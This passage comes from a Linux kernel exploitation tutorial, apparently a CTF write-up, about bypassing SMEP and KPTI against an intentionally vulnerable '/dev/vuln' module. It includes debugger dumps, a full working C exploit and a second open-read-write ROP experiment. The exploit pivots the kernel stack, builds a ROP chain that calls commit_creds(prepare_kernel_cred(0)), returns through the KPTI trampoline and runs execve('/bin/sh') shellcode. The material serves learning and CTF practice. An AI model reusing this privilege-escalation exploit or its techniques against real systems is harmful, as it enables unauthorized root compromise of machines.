 RIP  0xffffffff8149f601 ◂— 0x8008c3f7000000bc
───────────────────────────────────[ DISASM ]───────────────────────────────────
 ► 0xffffffff8149f601    mov    esp, 0xf7000000
   0xffffffff8149f606    ret    
    ↓
   0xffffffff81001219    pop    rdi
   0xffffffff8100121a    ret    
    ↓
   0xffffffff8107c0a0    push   rbp
   0xffffffff8107c0a1    mov    rbp, rdi
   0xffffffff8107c0a4    mov    rdi, qword ptr [rip + 0x18418b5]
   0xffffffff8107c0ab    push   rbx
   0xffffffff8107c0ac    mov    esi, 0x6000c0
   0xffffffff8107c0b1    call   0xffffffff81199180
 
   0xffffffff8107c0b6    test   rax, rax
───────────────────────────────────[ STACK ]────────────────────────────────────
00:0000│ rsp  0xffffc900000afc60 —▸ 0xffffffff8143f7f2 ◂— 0x74e868391aebc389
01:0008│      0xffffc900000afc68 —▸ 0xffff888003228700 —▸ 0xffffffff82077e44 ◂— 0x616562006373696d /* 'misc' */
02:0010│      0xffffc900000afc70 —▸ 0xffff888002b225b8 ◂— mov    dh, 0x21 /* 0xd21b6 */
03:0018│      0xffffc900000afc78 —▸ 0xffff888003eecf00 ◂— 0
04:0020│      0xffffc900000afc80 —▸ 0xffffffff81e6d3e0 ◂— 0x0
05:0028│      0xffffc900000afc88 ◂— 0x0
06:0030│      0xffffc900000afc90 —▸ 0xffffffff811a8b49 ◂— 0xed312275c589c085
07:0038│      0xffffc900000afc98 ◂— 0x0
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
 ► f 0 ffffffff8149f601
   f 1 ffffffff8143f7f2
   f 2 ffff888003228700
   f 3 ffff888002b225b8
   f 4 ffff888003eecf00
   f 5 ffffffff81e6d3e0
   f 6                0
────────────────────────────────────────────────────────────────────────────────

The result of our exploit is a success, we can read the flag.

/ $ /home/ctf/runme &
/ $ ls -al /flag
-rwxrwxrwx    1 root     root            24 Nov  2 07:32 /flag
/ $ cat flag
this is an example flag

Now let's move on to the hard and proper way.

Bypassing SMEP+KPTI via ROP

We know how SMEP and KPTI work now. So we can also speculate how they can be disabled. For SMEP, we simply need to change the CR4 register so that its 20th bit is turned off. KPTI is a bit more complicated. If we have arbitrary read/write and if we can locate the page table of the current process then KPTI can be disabled easily by turning off the NX bit via memory write. But this is way too much. Also if we have arbitrary read and write, we don't need to worry about any of this, as we can simply locate the cred structure and overwrite the uid, gid, euid fields. We need to think of a way that is feasible in ROP.

In many exploitation techniques, the core idea is to mimic what a normal routine does as close as possible. The core idea is to execute commit_creds(prepare_kernel_cred(0)) and do exactly what a kernel function does to return safely to user mode. We can do this easily by making use of already existing kernel code. In syscall return, there should be a stub of code that swaps the page table to usermode, swapgs and iret. I found this idea from this great write-up from the PerfectBlue CTF team, where they called it a KPTI exit trampoline.

So let's try it out. First we need to find the address for our trampoline as well. In the linux source code I found this code.

GLOBAL(swapgs_restore_regs_and_return_to_usermode)
#ifdef CONFIG_DEBUG_ENTRY
	/* Assert that pt_regs indicates user mode. */
	testb	$3, CS(%rsp)
	jnz	1f
	ud2
1:
#endif
	POP_REGS pop_rdi=0

	/*
	 * The stack is now user RDI, orig_ax, RIP, CS, EFLAGS, RSP, SS.
	 * Save old stack pointer and switch to trampoline stack.
	 */
	movq	%rsp, %rdi
	movq	PER_CPU_VAR(cpu_tss_rw + TSS_sp0), %rsp

	/* Copy the IRET frame to the trampoline stack. */
	pushq	6*8(%rdi)	/* SS */
	pushq	5*8(%rdi)	/* RSP */
	pushq	4*8(%rdi)	/* EFLAGS */
	pushq	3*8(%rdi)	/* CS */
	pushq	2*8(%rdi)	/* RIP */

	/* Push user RDI on the trampoline stack. */
	pushq	(%rdi)

	/*
	 * We are on the trampoline stack.  All regs except RDI are live.
	 * We can do future final exit work right here.
	 */
	STACKLEAK_ERASE_NOCLOBBER

	SWITCH_TO_USER_CR3_STACK scratch_reg=%rdi

	/* Restore RDI. */
	popq	%rdi
	SWAPGS
	INTERRUPT_RETURN

Let's try to find where this is in our kernel. First we open up vmlinux on our favorite disassembler/analyzer. However, there are no symbols. I check /proc/kallsyms and luckily I could find it.

/ # cat /proc/kallsyms | grep swapgs
ffffffff81a00a2f T swapgs_restore_regs_and_return_to_usermode

On IDA it looks like this:

.text:FFFFFFFF81A00A65                 mov     rdi, cr3
.text:FFFFFFFF81A00A68                 jmp     short loc_FFFFFFFF81A00A9E

									   ...

.text:FFFFFFFF81A00A9E                 or      rdi, 1000h
.text:FFFFFFFF81A00AA5                 mov     cr3, rdi
.text:FFFFFFFF81A00AA8                 pop     rax
.text:FFFFFFFF81A00AA9                 pop     rdi
.text:FFFFFFFF81A00AAA                 swapgs
.text:FFFFFFFF81A00AAD                 jmp     short loc_FFFFFFFF81A00AD0

									   ...

.text:FFFFFFFF81A00AD0                 test    byte ptr [rsp+20h], 4
.text:FFFFFFFF81A00AD5                 jnz     short loc_FFFFFFFF81A00AD9
.text:FFFFFFFF81A00AD7                 iretq

It's nearly exactly similar to the assembly stub in PerfectBlue's write-up.

So our ROP should be: PRIVESC ROP (prepare_kernel_cred, commit_creds) || KPTI_TRAMPOLINE || USERSPACE_RAX || USERSPACE_RDI || STUFF NEEDED FOR IRETQ. The "stuff needed for iretq" is discussed in the ret2usr tutorial, so if you don't know it please check that out.

So this is my working exploit.

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>

#define VULN_READ 0x1111
#define VULN_WRITE 0x2222
#define VULN_STACK 0x3333
#define VULN_PGD 0x4444

/* Request descriptor passed to the vulnerable module's ioctl:
 *   kaddr  - kernel address to read from / write to
 *   uaddr  - userspace buffer to copy to / from
 *   length - number of bytes to transfer
 */
struct rwRequest {
	void *kaddr;
	void *uaddr;
	size_t length;
};

/* Base of the kernel's direct physical map (valid with nokaslr). */
unsigned long pageOffsetBase = 0xffff888000000000;

/* open() wrapper: returns the descriptor, aborts the exploit on failure. */
int Open(char *fname, int mode) {
	int fd;
	if ((fd = open(fname, mode)) < 0) {
		perror("open");
		exit(-1);
	}
	return fd;
}

/* Arbitrary 8-byte kernel write via VULN_WRITE.  Closes its fd
 * (the original leaked one descriptor per call). */
void write64(unsigned long kaddr, unsigned long value) {

	struct rwRequest req;
	unsigned long value_ = value;

	req.uaddr = &value_;
	req.length = 8;
	req.kaddr = (void *)kaddr;

	int fd = Open("/dev/vuln", O_RDONLY);

	if (ioctl(fd, VULN_WRITE, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
	close(fd);
}

/* Arbitrary 8-byte kernel read via VULN_READ.  Closes its fd. */
unsigned long read64(unsigned long kaddr) {

	struct rwRequest req;
	unsigned long value;	/* fix: stray ';;' removed */

	req.uaddr = &value;
	req.length = 8;
	req.kaddr = (void *)kaddr;

	int fd = Open("/dev/vuln", O_RDONLY);

	if (ioctl(fd, VULN_READ, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
	close(fd);
	return value;
}

/* Leak the current kernel stack address (VULN_STACK).  Closes its fd. */
unsigned long leak_stack() {
	struct rwRequest req;
	unsigned long stack;

	int fd = Open("/dev/vuln", O_RDONLY);

	req.uaddr = &stack;
	if (ioctl(fd, VULN_STACK, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
	close(fd);

	return stack;
}

/* Leak the current process's top-level page directory (VULN_PGD).
 * Closes its fd. */
unsigned long leak_pgd() {
	struct rwRequest req;
	unsigned long pgd;

	int fd = Open("/dev/vuln", O_RDONLY);

	req.uaddr = &pgd;
	if (ioctl(fd, VULN_PGD, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
	close(fd);

	return pgd;
}

/*
 * Exploit entry point: builds a ROP chain in a userspace page mapped at
 * 0xf7000000, overwrites a kernel pointer so a stack-pivot gadget runs
 * in kernel mode, escalates privileges via commit_creds(
 * prepare_kernel_cred(0)), then returns to userspace through the KPTI
 * trampoline.  All kernel addresses below are hardcoded (nokaslr boot).
 */
int main (int argc, char **argv){
	
	// Userspace payload run after the iretq; presumably a standard
	// execve("/bin/sh") shellcode (ends in mov al, 0x3b; syscall) --
	// TODO confirm by disassembling.
	char final[] = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";
	// 0xffffffff8149f601 : mov esp, 0xf7000000 ; ret
	// Stack pivot: redirects the kernel stack into our mmap'd region.
	unsigned long gadget = 0xffffffff8149f601;

	// 0xffffffff81001219 : pop rdi ; ret 
	unsigned long pop_rdi = 0xffffffff81001219;

	// 0xffffffff81001a5c : pop rsi ; ret
	unsigned long pop_rsi = 0xffffffff81001a5c;

	// 0xffffffff81042ef7 : pop rdx ; ret
	unsigned long pop_rdx = 0xffffffff81042ef7;

	// 0xffffffff810cf971 : mov rdi, rax ; jne 0xffffffff810cf959 ; ret
	// The jne is conditional, so ZF must be set before this gadget runs.
	unsigned long mov_rdi_rax = 0xffffffff810cf971;

	// 0xffffffff8147a56e : cmp rdx, 8 ; jne 0xffffffff8147a55f ; ret
	// Used with rdx == 8 to force ZF=1 so mov_rdi_rax falls through.
	unsigned long cmp = 0xffffffff8147a56e;

	unsigned long commit_creds = 0xffffffff8107bd20;
	unsigned long prepare_kernel_cred = 0xffffffff8107c0a0;
	unsigned long chmod_internal = 0xffffffff811a1b50;
	unsigned long msleep = 0xffffffff810c4730;
	// swapgs_restore_regs_and_return_to_usermode + offset: pops two
	// registers, switches CR3 back to the user page tables, then iretq.
	unsigned long kpti_trampoline = 0xFFFFFFFF81A00A45;

	// Start the chain one page into the mapping, i.e. exactly at
	// 0xf7000000 where the pivot gadget points rsp.
	int i = 0x1000/8;

	// Two pages around the pivot target (one guard page below, since the
	// kernel pushes below rsp too).
	unsigned long *pivot_stack = mmap((void *)0xf7000000-0x1000, 0x1000+0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1, 0);
	if (pivot_stack == MAP_FAILED) {
		perror("mmap");
		exit(-1);
	}

	// Executable page holding the userspace shellcode (iretq target).
	void *u_code = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
	if (u_code == MAP_FAILED) {
		perror("mmap");
		exit(-1);
	}


	// Fresh userspace stack for after the return to usermode.
	void *u_stack = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_GROWSDOWN, -1, 0);
	if (u_stack == MAP_FAILED) {
		perror("mmap");
		exit(-1);
	}

	memcpy(u_code, final, sizeof(final));

	/*
	 1. RDI <- 0
	 2. CALL PREPARE_KERNEL_CRED (0xffffffff8107c0a0)
	 3. RDI <- RAX
	 4. CALL COMMIT_CREDS (0xffffffff8107bd20)
	 5. RDI <- 0xffffff9c
	 6. RSI <- "flag"
	 7. RDX <- 0777
	 8. CALL CHMOD_INTERNAL (0xffffffff811a1b50)
	 9. RDI <- 0x1000000
	10. CALL MSLEEP (0xffffffff810c4730)
	*/

	char *flag_str = "/flag";

	// touch the first page so that it doesn't fault
	pivot_stack[0] = 0xcafedeadbeef;

	// Privilege-escalation chain: commit_creds(prepare_kernel_cred(0)).
	pivot_stack[i++] = pop_rdi;
	pivot_stack[i++] = 0;
	pivot_stack[i++] = prepare_kernel_cred;
	pivot_stack[i++] = pop_rdx;           // rdx <- 8 ...
	pivot_stack[i++] = 8;
	pivot_stack[i++] = cmp;               // ... so cmp rdx, 8 sets ZF
	pivot_stack[i++] = mov_rdi_rax;       // rdi <- new cred (jne not taken)
	pivot_stack[i++] = commit_creds;

	// Return to userspace via the KPTI trampoline; it pops RAX/RDI
	// before the iretq frame (rip, cs, rflags, rsp, ss).
	pivot_stack[i++] = kpti_trampoline;
	pivot_stack[i++] = 0x12345678; // RAX
	pivot_stack[i++] = 0x87654321; // RDI
	pivot_stack[i++] = (unsigned long)u_code; //userspace_rip;
	pivot_stack[i++] = 0x33; //userspace_cs;
	pivot_stack[i++] = 0x246; //userspace_rflags;
	pivot_stack[i++] = (unsigned long)u_stack; //userspace_rsp;
	pivot_stack[i++] = 0x2b; //userspace_ss;


	// Overwrite a pointer inside the vuln module (0xffffffffc0002068,
	// presumably a fops handler -- TODO confirm against the module) with
	// the pivot gadget, then trigger it by touching /dev/vuln.
	write64(0xffffffffc0002068, gadget);
	open("/dev/vuln", O_RDONLY);

	return 0;
}

One thing very peculiar is how the page table is switched to user mode. By OR'ing 0x1000 into the kernel CR3 value we get the userspace page table. This is very interesting, because it implies that every kernel page table must have bit 12 (0x1000) clear — otherwise the kernel page table and the userspace page table would be the same. If anyone knows why PTI is implemented as cr3 = cr3 | 0x1000 rather than cr3 = cr3 + 0x1000, please tell me.

I searched some slides, and found this. This image is a good representation of what's going on.

alt text

ROP Fun

In userland ROP, when seccomp was enabled, we wrote an OPEN-READ-WRITE ROP chain. I wondered if something similar to this can be done in kernel space. My plan is to escalate to root, do an Open-Read and write flag to stdout. I know that this kind of act is not so different from our previous feats, but this is just for fun.

First we find the system call handlers for open, read and write via /proc/kallsyms.

/ # cat /proc/kallsyms | grep sys_open
ffffffff8107ac40 W __x32_compat_sys_open_by_handle_at
ffffffff811a20a0 T do_sys_open
ffffffff811a22c0 T __x64_sys_open
ffffffff811a22e0 T __ia32_sys_open
ffffffff811a2300 T __x64_sys_openat
ffffffff811a2320 T __ia32_sys_openat
ffffffff811a2340 T __ia32_compat_sys_open
ffffffff811a2360 T __ia32_compat_sys_openat
ffffffff811ff390 T __x64_sys_open_by_handle_at
ffffffff811ff3b0 T __ia32_sys_open_by_handle_at
ffffffff811ff3d0 T __ia32_compat_sys_open_by_handle_at
ffffffff81216840 t proc_sys_open

Now we look at __x64_sys_open from IDA.

.text:FFFFFFFF811A22C0                 mov     edx, [rdi+68h]
.text:FFFFFFFF811A22C3                 movzx   ecx, word ptr [rdi+60h]
.text:FFFFFFFF811A22C7                 mov     rsi, [rdi+70h]
.text:FFFFFFFF811A22CB                 mov     edi, 0FFFFFF9Ch
.text:FFFFFFFF811A22D0                 or      dh, 80h
.text:FFFFFFFF811A22D3                 jmp     sub_FFFFFFFF811A20A0

It seems that the arguments are set properly from the user stack and do_sys_open (0xFFFFFFFF811A20A0) is called. So in order to make an open system call, we need to do do_sys_open(0xFFFFFF9C, arg1, arg2, arg3).

I speculated that the rest should be the same, for READ/WRITE. Actually this observation was made on CHMOD in ret2usr tutorial.

I look at __x64_sys_read (0xffffffff811a5780) on IDA and it shows a similar pattern, except for the fact that the first argument is not hard-wired to 0xFFFFFF9C.

.text:FFFFFFFF811A5780                 mov     rdx, [rdi+60h]
.text:FFFFFFFF811A5784                 mov     rsi, [rdi+68h]
.text:FFFFFFFF811A5788                 mov     rdi, [rdi+70h]
.text:FFFFFFFF811A578C                 jmp     loc_FFFFFFFF811A56D0

I also peek at __x64_sys_write (0xffffffff811a5860) and it's exactly the same.

.text:FFFFFFFF811A5860                 mov     rdx, [rdi+60h]
.text:FFFFFFFF811A5864                 mov     rsi, [rdi+68h]
.text:FFFFFFFF811A5868                 mov     rdi, [rdi+70h]
.text:FFFFFFFF811A586C                 jmp     sub_FFFFFFFF811A57B0

Actually I found out that 0xFFFFFFFF811A56D0 is ksys_read and 0xFFFFFFFF811A57B0 is ksys_write respectively, by inspecting /proc/kallsyms a bit more. So our exploit should do

0. escalate to root via commit_creds(prepare_kernel_cred(0))
1. ksys_read(do_sys_open(0xFFFFFF9C, "flag", 0), userbuf, 0x100)
2. ksys_write(1, userbuf, 0x100)
3. msleep(0x10000)

The result is

/ $ /home/ctf/runme
[   15.198738] ------------[ cut here ]------------
[   15.199394] do_IRQ(): runme has overflown the kernel stack (cur:ffffc900000cc000,sp:f6ffff10,irq stk top-bottom:ffff888003600080-ffff888003604000,exception stk top-bottom:fffffe000000a080-fffffe000000c000,ip:_raw_spin_unlock_irqrestore+0x5/0x10)
[   15.200365] WARNING: CPU: 0 PID: 1035 at arch/x86/kernel/irq_64.c:73 handle_irq+0xfd/0x110
[   15.200751] Modules linked in: vuln(PO)
[   15.201263] CPU: 0 PID: 1035 Comm: runme Tainted: P           O      4.19.76 #1
[   15.201567] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
[   15.201844] RIP: 0010:handle_irq+0xfd/0x110
[   15.202068] Code: 00 00 50 65 4c 8b 14 25 40 4d 01 00 57 49 81 c2 28 06 00 00 48 c7 c7 b8 86 fb 81 4c 89 d6 c6 05 13 19 30 01 01 e8 63 dd 03 00 <0f> 0b 48 83 c4 18 e9 77 ff ff ff 90 90 90 90 90 90 90 90 83 ff 02
[   15.202576] RSP: 0018:ffff888003603fa0 EFLAGS: 00000086
[   15.202741] RAX: 00000000000000e9 RBX: ffff888003036000 RCX: ffffffff82247018
[   15.202923] RDX: 0000000000000001 RSI: 0000000000000082 RDI: ffffffff828c092c
[   15.203136] RBP: 0000000000000027 R08: 303178302f357830 R09: 29303178302f3578
[   15.203356] R10: ffff888003327468 R11: 2b65726f74736572 R12: 00000000f6fffe68
[   15.203635] R13: 0000000000000027 R14: 0000000000000000 R15: 0000000000000000
[   15.203909] FS:  0000555556d72880(0000) GS:ffff888003600000(0000) knlGS:0000000000000000
[   15.204261] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   15.204433] CR2: 00000000f7000000 CR3: 0000000002b9a000 CR4: 00000000001006f0
[   15.204660] Call Trace:
[   15.205068]  <IRQ>
[   15.205294]  ? _raw_spin_unlock_irqrestore+0x5/0x10
[   15.205468]  do_IRQ+0x3c/0xd0
[   15.205572]  common_interrupt+0xf/0xf
[   15.205802] WARNING: can't dereference registers at (____ptrval____) for ip common_interrupt+0xf/0xf
[   15.205877]  </IRQ>
[   15.206210] ---[ end trace 55b0043343db98e4 ]---
this is an example flag

After the panic, we see the flag. I don't know why the kernel panics, but it's kinda weird for it to not panic as well...

You can’t perform that action at this time.